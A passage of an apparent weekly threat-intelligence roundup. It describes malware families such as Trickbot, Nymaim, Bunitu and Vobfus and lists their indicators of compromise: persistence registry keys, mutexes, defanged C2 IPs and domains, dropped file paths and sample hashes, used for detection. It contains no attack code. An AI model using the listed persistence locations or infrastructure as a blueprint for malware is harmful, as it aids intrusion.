\nWin.Malware.Trickbot-7394707-1 | Malware | Trickbot is a banking trojan targeting sensitive information for select financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts. \nWin.Worm.Vobfus-7395002-0 | Worm | Vobfus is a worm that copies itself to external drives and attempts to gain automatic code execution via autorun.inf files. It also modifies the registry so that it will launch when the system is booted. Once installed, it attempts to download follow-on malware from its C2 server. \nWin.Malware.DarkComet-7395004-1 | Malware | DarkComet and related variants are a family of RATs designed to provide an attacker with control over an infected system. Capabilities of this malware include the ability to download files from a user's machine, mechanisms for persistence and hiding, and the ability to send back usernames and passwords from the infected system. \nWin.Ransomware.Cerber-7395321-0 | Ransomware | Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension \".cerber,\" although in more recent campaigns, this is no longer the case. \nWin.Dropper.Remcos-7395733-0 | Dropper | Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, and capture screenshots. It is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails. \nWin.Dropper.Tofsee-7402230-0 | Dropper | Tofsee is multipurpose malware that features several modules used to carry out malicious activities, such as sending spam messages, conducting click fraud, mining cryptocurrency and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator\u2019s control. \n \n* * *\n\n## Threat Breakdown\n\n### Win.Downloader.Nymaim-7391562-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\GOCFK ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\KPQL ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\GOCFK \nValue Name: mbijg ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\KPQL \nValue Name: efp ` | 25 \nMutexes | Occurrences \n---|--- \n`Local\\{369514D7-C789-5986-2D19-AB81D1DD3BA1}` | 25 \n`Local\\{D0BDC0D1-57A4-C2CF-6C93-0085B58FFA2A}` | 25 \n`Local\\{D8E7AB94-6F65-71DE-8DA1-FE621BE2E606}` | 25 \n`Local\\{F04311D2-A565-19AE-AB73-281BA7FE97B5}` | 25 \n`Local\\{F6F578C7-92FE-B7B1-40CF-049F3710A368}` | 25 \n`Local\\{0F53A50D-AEA8-402A-580B-3C32A490301E}` | 25 \n`Local\\{42FDAA48-39A4-4464-9CC4-6F1A48111B12}` | 25 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`sqmgdts[.]net` | 25 \n`wneeuc[.]in` | 25 \n`jiwlzenl[.]com` | 25 \n`zgzaztmi[.]com` | 25 \n`amkqrprvei[.]com` | 25 \n`srbhfbemi[.]pw` | 25 \n`yoekgdnoyej[.]in` | 25 \n`scwafgfxlr[.]net` | 25 \n`grnorxacnw[.]com` | 25 \n`futzruakw[.]pw` | 25 \n`dhcfsfxgb[.]net` | 25 \n`lmgsmlhidh[.]net` | 25 \n`fpmuefeozs[.]in` | 25 \n`wjpbf[.]net` | 25 \n`yfuoixdwjxpy[.]pw` | 25 \n`sqwpuwoq[.]net` | 25 \n`wqjlwcnqbe[.]com` | 25 \n`tjjqmo[.]net` | 25 \n`bsztb[.]in` | 25 \n`gmznk[.]com` | 25 \n`cejwtluei[.]com` | 25 \n`rejfedtcd[.]net` | 25 \n`uktldpj[.]com` | 25 \n`aanpolaayjm[.]net` | 25 \n`rdipde[.]com` | 25 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%ProgramData%\\ph` | 25 \n`%ProgramData%\\ph\\eqdw.dbc` | 25 \n`%ProgramData%\\ph\\fktiipx.ftf` | 25 \n`%TEMP%\\gocf.ksv` | 25 \n`%TEMP%\\kpqlnn.iuy` | 25 \n`%TEMP%\\fro.dfx` | 24 \n`%TEMP%\\npsosm.pan` | 24 \n`\\Documents and Settings\\All Users\\pxs\\dvf.evp` | 24 \n`\\Documents and Settings\\All Users\\pxs\\pil.ohu` | 24 \n \n#### File Hashes\n\n` 009c5d8c565ffc008a15040f7c1ce30a65321089606ad3e6e711e715e65ed5d3 043fd8c728078e4cc3402b65d216e224a482532faaa18dff9ce7baea068666a6 0c6cf23450cb8d2f982780d0b63b32f84c4cef5ed035b336198cfab945d7222f 0e2c7c4988f5d6b83aa46bfaec967e409310588fb31d41aaf752cd0cd1f61e07 159157544afea2dae4868b345f3ace9dbb3946dcdb051afda1f9d3de43b84b5b 27992098e220360f3a5896812a077ba611dce6936c7d8a93a8851b9498534483 2f625f48f37cc6d9ad56bf49690f578d345ca7938750614fce45a6db3ea94ee2 3b8723dccf6a910c012cba048918b741661a40bb9256356935af7dbf1c1417c4 3dccca8f309ddb9675ef1099afa48c99259af991603ffe82a83ad9516b5742f3 5c3ad5d944eb5911e73ced27779e8ecb6a555c64ace076998018e313c058c128 630b0e5f46a932762b7e569f0785e163db04a5e482a1b2c2469343439cd5f004 689c22dc80615221d5c64720f599a33eaa093e27aabcd89191fa446d5dcc8463 75d8010dab02726e712f1ba1cba34ae48d3aabf897c22caf258a552282c7cfa3 776186df1d180131e8272e9bed1901a10156c3f12adacd904b8023fe5f164b22 8837d607c0bf29f0855967de0cb3ac6e36c6418786e693dbcb92cce0addef532 8ad6d601b0d1e03dda4b01708e40fcbcc66e610c2b848f1662b26d70aa358cf6 8b75cc8eeff51a02702262472039bda60c892e0beba4f76d5b3262f1c1482081 8cb66655a63b931fd20483d5b347756980e2a5f1d70a66fb84819b1a10c82722 9c79e22684603ef09d8939a72827d9e39478e2583740f55d4a5f676a4d1cd30c a02dc770b986b1360c6534907f5c9ad368f7810da498a6df1e2bedd665db75ef a0977a0743fd97773d06407074172e2e763d5306310075b301833454204fecce a2eef697284f59a4306ad79669dcb9c1e095595cbf52a73a6775e90a34c790c4 a94e7042aea0920a02775452ec9f05ab07b7ae60a7c9466a2ce8eb8b5e40b428 aaa24779cd52e2685d6646ac379a1c102b8811f1d969e16c2d6b358d00a147ec ad3f4bd490dd4134e099d505123e528f858463a7e17989c258516c7d24ac3836 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-dJQK21RVxuI/XdgSkbUbfVI/AAAAAAAAC6c/MZoblgpsix8XIvUo5UIjmOu1nS_ARpDPACLcBGAsYHQ/s1600/3b8723dccf6a910c012cba048918b741661a40bb9256356935af7dbf1c1417c4_amp.png>)\n\n \n\n\n* * *\n\n### Win.Trojan.Bunitu-7394346-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE\\AUTHORIZEDAPPLICATIONS\\LIST ` | 26 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS\\PARAMETERS\\FIREWALLPOLICY\\STANDARDPROFILE\\AUTHORIZEDAPPLICATIONS\\LIST \nValue Name: C:\\Windows\\system32\\rundll32.exe ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\DAOEMNI ` | 11 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\DAOEMNI \nValue Name: Impersonate ` | 11 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\DAOEMNI \nValue Name: Asynchronous ` | 11 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\DAOEMNI \nValue Name: MaxWait ` | 11 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\DAOEMNI \nValue Name: DllName ` | 11 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\DAOEMNI \nValue Name: Startup ` | 11 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: daoemni ` | 11 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\DAOMNI ` | 9 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\DAOMNI \nValue Name: Impersonate ` | 9 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\DAOMNI \nValue Name: Asynchronous ` | 9 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\DAOMNI \nValue Name: MaxWait ` | 9 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\DAOMNI \nValue Name: DllName ` | 9 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\DAOMNI \nValue Name: Startup ` | 9 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: daomni ` | 9 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\OMNILG ` | 5 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\OMNILG \nValue Name: Impersonate ` | 5 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\OMNILG \nValue Name: Asynchronous ` | 5 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\OMNILG \nValue Name: MaxWait ` | 5 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\OMNILG \nValue Name: DllName ` | 5 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\OMNILG \nValue Name: Startup ` | 5 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: omnilg ` | 5 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: syncfx ` | 1 \nMutexes | Occurrences \n---|--- \n`qazwsxedc` | 26 \n`A9ZLO3DAFRVH1WAE` | 25 \n`I106865886KMTX` | 25 \n`IGBIASAARMOAIZ` | 25 \n`J8OSEXAZLIYSQ8J` | 25 \n`LXCV0IMGIXS0RTA1` | 25 \n`TXA19EQZP13A6JTR` | 25 \n`VSHBZL6SWAG0C` | 25 \n`A9MTX7ERFAMKLQ` | 25 \n`3G1S91V5ZA5fB56W` | 1 \n`8AZB70HDFK0WOZIZ` | 1 \n`NHO9AZB7HDK0WAZMM` | 1 \n`PJOQT7WD1SAOM` | 1 \n`PSHZ73VLLOAFB` | 1 \n`VHO9AZB7HDK0WAZMM` | 1 \n`VRK1AlIXBJDA5U3A` | 1 \n`<random, matching '[A-Z0-9]{14}'>` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`209[.]85[.]144[.]100` | 25 \n`172[.]217[.]7[.]206` | 21 \n`66[.]199[.]229[.]251` | 21 \n`62[.]75[.]222[.]235` | 21 \n`95[.]211[.]230[.]86` | 16 \n`5[.]104[.]230[.]200` | 5 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`w[.]topfealine[.]com` | 20 \n`l[.]topfealine[.]com` | 14 \n`w[.]netzsoflow[.]net` | 5 \n`n[.]netzsoflow[.]net` | 5 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt` | 19 \n`%TEMP%\\<random, matching '[A-F0-9]{4,5}'>.dmp` | 19 \n`%LOCALAPPDATA%\\daoemni.dll` | 11 \n`%LOCALAPPDATA%\\daomni.dll` | 9 \n`%HOMEPATH%\\Local Settings\\Application Data\\daoemni.dll` | 9 \n`%HOMEPATH%\\Local Settings\\Application Data\\daomni.dll` | 7 \n`%LOCALAPPDATA%\\omnilg.dll` | 5 \n`%HOMEPATH%\\Local Settings\\Application Data\\omnilg.dll` | 5 \n \n#### File Hashes\n\n` 05fc7a5cbd0145db5324d216eca44799f3089ce93b9020b1e79a8ffd074373e9 155931a83c112e3b9ec9e53170bc01f00f627149abb4df90506ff9746420ac33 1e781bec2e81a7ea35b3170ba13b8c383a5b34333bfdf5fb8c8fc2da89c79b47 21b62ce885fbb5ad9b6de7cec0bcfd9af51818e97f79b780457775515a36b3b7 22becfbe5b71e26f87a6f3525a75af422f9c6903873911290bc20f8869bd0b83 281c088b7ad0f9ed61fbdd599ffb2fdcd934a02ad66fe16b1f40c0e668d203fa 2f2e4c912ae939c550ab3d3d9723d562ceff5cd8f120570bf2ca75975d5dada1 32ea5866bda9068d8c0f10f3c50225823254194f89f841483e6dbad2e8227315 35c4024898d064cea42eebd3efe714e031aeb7a5cd685ff8fc55176762a6c5cc 371abc331dd0d9f9ae078efd7b88a60795e6707f1833f3b31675a7e80b96843f 392a1507494a62ddd1ad5f6659487254930dbba1dbcc98b3d0f34a1ab1852128 3e27faf67ebc38dc381617546201dafb570bcabc12d1d85e2088da56262d80e9 40d378b966cecafc1ba06ddfcbfb644fd408f83792e40109cd810914825d6b06 45f55ec75fdc96afb4133334435b00ea598206c9f00094a8ac42bbc37ff64310 50ab0d77e4368f929287ef0fe486712cc615f9a9c3d74f7767a257d2a677e1ae 551411d65a597560b93c303fc3fd0bde366f4fd767a940a127bc35c0e188255f 56873d0e1082711b6e9f7c0dd230fd76963f5fe977002bba0fdd51d320d2480a 57260f19a6a615eba7325d454666b2a3cf05589e4ffd20eb34c67c4493b613d2 5b144acca2679ab8563e70e789ef0026b25dcc3e2f96e651a504ef35d7cfc1ae 6243725e2486608c0266f4b954487310e8b36f092e5172eacf967a37e12c49c1 6a836249f7f7cdaa5c796248b0684f0ca45bfa524148331b8de2e395d5b0b88a 8127c67786fa6bcf2ba3b891d1619f6b2589027d94d0f8b5f10a005a1dcc4df8 8b7e399b092922ae7972799f1d28d1f40bf2c463ec2ac90d332a816c1b307cbd 9b33901eb6a246891da01fba649a7ea058c10fc5865a6610b4627fa53d3c50cb 9db359f9c8d9e4960e5fb5475c4c873b386a522ef9340153966c841e594ea224 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-MEH_qUEI3bc/XdgSxcGd8DI/AAAAAAAAC6g/beSkK_PU_8UaxAmaPrhSHSu31uZL9nlmACLcBGAsYHQ/s1600/21b62ce885fbb5ad9b6de7cec0bcfd9af51818e97f79b780457775515a36b3b7_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Trickbot-7394707-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 \nValue Name: Blob ` | 3 \nMutexes | Occurrences \n---|--- \n`Global\\316D1C7871E10` | 26 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`117[.]196[.]233[.]100` | 10 \n`94[.]156[.]144[.]74` | 5 \n`78[.]24[.]219[.]9` | 5 \n`45[.]224[.]214[.]34` | 4 \n`103[.]219[.]213[.]102` | 3 \n`212[.]80[.]218[.]144` | 3 \n`216[.]239[.]32[.]21` | 2 \n`62[.]109[.]22[.]2` | 2 \n`107[.]173[.]240[.]221` | 2 \n`144[.]91[.]80[.]253` | 2 \n`51[.]89[.]115[.]110` | 2 \n`176[.]58[.]123[.]25` | 1 \n`116[.]203[.]16[.]95` | 1 \n`52[.]55[.]255[.]113` | 1 \n`69[.]195[.]159[.]158` | 1 \n`177[.]154[.]86[.]145` | 1 \n`66[.]85[.]173[.]57` | 1 \n`5[.]182[.]210[.]254` | 1 \n`117[.]255[.]221[.]135` | 1 \n`185[.]222[.]202[.]25` | 1 \n`195[.]123[.]220[.]155` | 1 \n`117[.]206[.]149[.]29` | 1 \n`170[.]84[.]78[.]224` | 1 \n`91[.]108[.]150[.]213` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`ident[.]me` | 1 \n`myexternalip[.]com` | 1 \n`ip[.]anysrc[.]net` | 1 \n`ipecho[.]net` | 1 \n`checkip[.]amazonaws[.]com` | 1 \n`wtfismyip[.]com` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\cmdcache` | 26 \n`%APPDATA%\\cmdcache\\\u00d1\u0081\u00d1\u2021\u00d0\u00b2.exe` | 26 \n`%System32%\\Tasks\\Command cache application` | 26 \n`%ProgramData%\\\u00d1\u0081\u00d1\u2021\u00d0\u00b2.exe` | 26 \n`%APPDATA%\\cmdcache\\data` | 26 \n`%APPDATA%\\cmdcache\\settings.ini` | 26 \n`%TEMP%\\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt` | 25 \n`%TEMP%\\<random, matching '[A-F0-9]{4,5}'>.dmp` | 25 \n \n#### File Hashes\n\n` 031dba2decd40789db3851d1940275bab98d378ceb410eb661b463adf2410650 07553800c14fabbb3aca709a6d5d7af0b9936504fb3d1406825ba6034e22f97f 0d2da6104e039e429a4bb0f2a27744879a4551cbadb1e4a44de54343a6c0ac6c 218ba8f3d20fbab8eaa94aa7d3aa6ffe417d859bbf6bbd499c1e6211f0292a07 26616609c018bb2081c86a11b1567865a4ee63686eff17f4b7e88b6655ad93eb 2cd5c3baae45b92b8f39f808493a9805f94eed3847b94c853bfb160217225887 2da40b82795dff861dd4bf9025b4fd659e398d894df20ef399c1960fe92de323 334aafa1b9ac0f0d94f690a25ad5841e732de6c0609704e838e8c8ad8986a207 339c9866157b0f51d0fe6c644cd8b485672fdbf16ad5244ceaa7b4eab9d0fd56 33da9747569d5cfa3e42d8a98b8cb941829905cac809428de49e9d011372b3be 3476f50e527ab1558f8a12b20a6d0394045c98b7b352f9703499c54ac13b526a 38548798cfcc55fc8200d3f3482d9eb7eafc14feda2b88b22d143c4fec75a175 3d9bb460763687a31c360beb958abae1a5e10add4fad3b0a9e3fb70aa3803241 3e1762697fe5f1996a8cd224a97bfd47fc2578ac1950d5e177cc17edc4fa9094 4766ae5c1ffdbf142e5c7df792654f591c1ef4df1e7775484d458c2b8237312a 4793182f8a55a7d2df459ea2ef2ed27835bfe43648d78bbe540ecfe9185f4380 48f273faec8a9236fadadcd0b88cc416eab9c4c40b064742213c1e5ed24cc105 4b3ff0afe6f834a9c05354fd2089662e670e9203b864969e0d67bb957af37c43 4cfabac70d45aa70f7e129fcf234ebf84e0edb950380bacf0008616d8059601b 53677c31b06dbf686f019dad8465876ae4e757adf186d02d60a5194106ee20da 5441d28936218f078a094e4b03a60db5f06a890f02ebbbabbf2e4345ef3ed05a 5641e7f156339b3c2d624972d9eea74910e39f0620aed2eadff1fa0635137541 58d92ae7cacfadf7ca36fbabebfa721299c4a828f81707290416639919f0fb20 5953aba170deb68dde4ddd8132b51260167186cdb24a6b42d85edc28eaa49211 5b80b61034467babade5a004fab79adb3d9f18416345c1cdbe6ca0776c9c9513 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-1RgheslVqP4/XdgS-3RutLI/AAAAAAAAC6k/bSjKvt_b0_4eB2yJg4pr3I1sQKA35w7lwCLcBGAsYHQ/s1600/5953aba170deb68dde4ddd8132b51260167186cdb24a6b42d85edc28eaa49211_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Worm.Vobfus-7395002-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: ShowSuperHidden ` | 26 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\WINDOWSUPDATE\\AU ` | 26 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\WINDOWSUPDATE\\AU \nValue Name: NoAutoUpdate ` | 26 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\WINDOWSUPDATE ` | 26 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: ciiti ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: supej ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: zauuca ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: yxyom ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: wznoid ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: qousu ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: jiigio ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: bmjiif ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: ryhiy ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: caodaap ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: viean ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: beoal ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: fiiisep ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: fuafoop ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: juuso ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: peaceit ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: mbnur ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: zoelie ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: teuemar ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: jomol ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: yiozaot ` | 1 \nMutexes | Occurrences \n---|--- \n`A` | 26 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`204[.]11[.]56[.]48` | 26 \n`46[.]166[.]182[.]115` | 13 \n`37[.]48[.]65[.]148` | 11 \n`64[.]32[.]8[.]67` | 7 \n`207[.]244[.]67[.]214/31` | 4 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`ns1[.]anytime2[.]net` | 26 \n`ns1[.]anytime3[.]net` | 26 \n`ns1[.]anytime3[.]org` | 26 \n`ns1[.]anytime2[.]com` | 26 \n`ns1[.]anytime4[.]com` | 26 \n`ns1[.]anytime2[.]org` | 26 \n`ns1[.]anytime1[.]net` | 26 \n`ns1[.]anytime1[.]org` | 26 \n`ns1[.]anytime1[.]com` | 26 \nFiles and or directories created | Occurrences \n---|--- \n`\\autorun.inf` | 26 \n`\\System Volume Information.exe` | 26 \n`\\$RECYCLE.BIN.exe` | 26 \n`\\Secret.exe` | 26 \n`\\Passwords.exe` | 26 \n`\\Porn.exe` | 26 \n`\\Sexy.exe` | 26 \n`E:\\autorun.inf` | 26 \n`E:\\$RECYCLE.BIN.exe` | 26 \n`E:\\Passwords.exe` | 26 \n`E:\\Porn.exe` | 26 \n`E:\\Secret.exe` | 26 \n`E:\\Sexy.exe` | 26 \n`E:\\System Volume Information.exe` | 26 \n`E:\\x.mpeg` | 26 \n`%HOMEPATH%` | 26 \n`%HOMEPATH%\\Passwords.exe` | 26 \n`%HOMEPATH%\\Porn.exe` | 26 \n`%HOMEPATH%\\Secret.exe` | 26 \n`%HOMEPATH%\\Sexy.exe` | 26 \n`%HOMEPATH%\\c` | 26 \n`%HOMEPATH%\\c\\Passwords.exe` | 26 \n`%HOMEPATH%\\c\\Porn.exe` | 26 \n`%HOMEPATH%\\c\\Secret.exe` | 26 \n`%HOMEPATH%\\c\\Sexy.exe` | 26 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0114132de55fe3391d2ffe1eb2235af64538e704a5d39a7c12a5242b26feff60 024c44316844dd33ee87876a1acf6b823b30f97b8f9b2aa593289df21b0ec1d7 056bf3cca6f0cd4e41ad01e0eb4700bee0271c2bb3334642784920529e2554de 07ee7ffcf647257d1293ad9826c82fc09398f657092c25b21169f87fa5a7c9d4 08169078f447a9671714276fd75f906cd349fb720001a77d78bef56b9e35a233 081aabf461e76026a4b5ce622d7dea97bd5c69bd7f6291bc69325ee9e1b2478b 082ee719168ea7be341b1303d4e62fe30007af27470e269a63aa0b1098e7d488 084b2c416ebeb7c01a099604458bc0851f1e1e8b2f230522898cf4084c803f15 0a1e200b0c26beab5775cfa61c2639ea27157e46781e70cbd78a4b19232b632b 0ad7fb766799dd2f438ba70821e2c7f6b2e08c524fd750b34a6209ab8ac3d480 0b11ae767b606de45c93913ce84153b226eae42d035871a9955f19c4cbb46c7a 0bf91f7b0d81a825f042006243db69eb23d52726c19b335ad42e188c53616d99 0c5f7e0d447a0f9445888ba803a9c6bb223bdee7d982be2f833d6184e754b7b0 0e323827671fd25c7f89c594618623916a4dc60221f405a3f2bf7df0275e4e0d 0eb69de315990b07cdc4e6472f7b1a178412d9730766fddb596bddf5b2576ed1 1396cae157a806641cb34122f34c22b4dc995028686f6a082725e4e335e60aed 13a7e9c873e5e108d28acca607b1689f391c1036db6d977f8602908046ca4739 148a31211653eb50a050446b5556cf02846f957e210725c56cde63b8196384e5 156452ee7c520ac7ef66233c06b2d9bb8faa3c119e9ae697a53695a7f10c3fa3 15b5879a31b9e41872a13caefbff2bc7e4b672beb19a6fbc3c5b5a38774cc13d 16fa24d44c523e35c4c37fc149647d7e6c21d090a047127fc8d68fc6b9ad8a42 1713907f8ca3dc61f966a367d1d65a4dc13e525fc8ce091b2147d3665a3c0c23 193491d849129d8286edd480622bbe6da83f551d6cd8d3eb16c3cc38c21eeacb 1a59da8f0388e798d4ade89f7c880166b72ad576cc87a883568d614df2d0529d 1b1de63ef24f88d5350acd0909ed76b0ee71c7fa327a715bb1ae554feb33837b `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### 